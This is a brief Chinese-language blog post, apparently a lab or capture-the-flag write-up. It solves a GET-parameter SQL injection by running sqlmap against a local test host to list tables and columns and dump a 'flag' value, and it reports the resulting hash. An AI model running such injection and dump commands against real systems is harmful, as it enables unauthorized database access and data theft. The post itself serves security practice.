标签:art col gid ges image es2017 .com bsp body
1.
get注入,放到sqlmap里跑一下
首先查看他使用哪个数据库
sqlmap.py -u “http://192.168.244.134/pentest/test/sqli/sqltamp.php?gid=1“ -D pentesterlab --tables
sqlmap.py -u "http://192.168.244.134/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag --columns
sqlmap.py -u "http://192.168.244.134/pentest/test/sqli/sqltamp.php?gid=1" -D pentesterlab -T flag -C flag --dump
最终结果为204f704fbbcf6acf398ffee11989b377
标签:art col gid ges image es2017 .com bsp body
原文地址:http://www.cnblogs.com/zhuifengxiaozi/p/7642739.html